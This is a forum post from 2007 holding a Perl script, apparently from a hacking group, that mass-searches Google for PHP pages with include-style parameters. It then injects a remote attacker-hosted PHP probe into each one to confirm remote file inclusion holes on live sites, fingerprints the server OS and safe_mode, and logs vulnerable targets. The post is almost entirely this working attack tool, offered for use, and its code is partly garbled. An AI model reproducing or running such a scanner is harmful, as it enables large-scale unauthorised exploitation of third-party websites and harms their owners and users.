Ras Posted May 5, 2007 Report Posted May 5, 2007 #! /usr/bin/perl# ================================================================ ## google-php-include-bugs searcher v 0.8 ## (c)oded by drmist\STNC ## [url]www.security-teams.net[/url] ## ## ATTENTION. THIS SCRIPT IS PRIVATE. ## ONLY FOR STNC AND FRIENDS. NOT FOR SALE. ## ## Usage: perl script.pl --log=<log-file> --url=<test-script-url> ## Test script: ## <?php ## error_reporting(0); ## $s = md5("STNC"); ## $code = eregi("windows", php_uname())+ ## 2*eregi("apache", getenv("SERVER_SOFTWARE"))+ ## 4*ini_get('safe_mode'); echo $s."[$code]".$s; ## ?> ## ================================================================ #use IO::Socket;@inc_bugs = ("page", "text", "print", "html", "url", "view", "show", "body", "cat", "inc", "incl", "include", "read", "write", "data", "code", "fname", "filename", "cont", "content", "menu", "open", "file", "id", "p", "f", "seite", "pagina", "vista", "vue", "visao", "datei", "offnen", "corpo", "corps", "ouvrir", "fichier", "abrir", "fichero", "inhalt", "contenu", "conteudo");@zones = ("com", "net", "org", "de", "fr", "uk", "br", "am", "info", "name", "aero", "biz", "edu", "ws", "in", "cn", "us", "be", "it", "cc", "tv", "ru", "su", "jp", "kz", "se", "is", "ca", "gs", "ms", "vg", "be", "fi", "gov");@ftypes = ("php", "php3");$boundary = "ca73bad132fa0c99fe9ce9efe9029e21"; # md5("STNC");for($i = 0; $i < @ARGV; $i++){ if($ARGV[$i] =~ /^--log=(.*)$/) { $log = $1; } elsif($ARGV[$i] =~ /^--url=(.*)$/) {$script = $1; }}if(!($script && $log)){ usage(); exit; }foreach $inc(@inc_bugs){ foreach $zone(@zones) { foreach $ftype(@ftypes) { $request = "filetype:$ftype site:$zone inurl:$inc="; print "\n[$request]\n"; $request =~ s/(.)/sprintf("%%%02x",ord($1))/eg; @dn = (); for($i = 0;$i < 10; $i++) { @temp = get("http://www.google.com/search?filter=0&num=100&start=".$i. "00&q=$request") =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi; foreach $url (@temp){ if($url !~ /($inc=[^\&]+)/i) { next; } $left = $`; $right = $'; if($url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i){ next; } if($url =~ /google\.com/i){ next; } ($domain) = $url =~ /^http\:\/\/([a-z0-9\.\-]{5,})/; if($domain =~ /^www\.(.+)$/) { $domain = $1; } $f=0;foreach(@dn){if($_ eq $domain){$f++;last;}}if($f){next;} push @dn, $domain; $print = "$left$inc=[INCLUDE]$right"; if(($data) = get("$left$inc=$script\?$right") =~ /$boundary\[([0-9]+)\]$boundary/i) { $s = "$print - ".(($data % 2) ? "WINDOWS" : "UNIX").(($data > 3) ? ", SAFE_MODE" : "")."\n"; $count++; print "[$count] $s"; open LOG, ">>$log"; print LOG $s; close LOG; } else { print "$print - no bugs\n"; }} } } }}sub timeout() { close $sock; }sub get(){ local $request = $_[0]; local $port = 80; local $data = ""; if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/) { if($server =~ /^([^\:]+)\[0-9]{2,5})$/){ $server = $1; $port = $2; } $sock = IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => 'tcp', Type => SOCK_STREAM, TimeOut => $timeout ) or return 0; # connection failed print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n"; $SIG{ALRM} = \&timeout; alarm 10; while(<$sock>){ $data .= $_; } alarm 0; close $sock; } return $data;}sub usage(){print qq(Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source>Test script:<?phperror_reporting(0);\$s = md5("STNC");\$code = eregi("windows", php_uname())+2*eregi("apache", getenv("SERVER_SOFTWARE"))+4*ini_get('safe_mode'); echo \$s."[\$code]".\$s;?>);} Quote
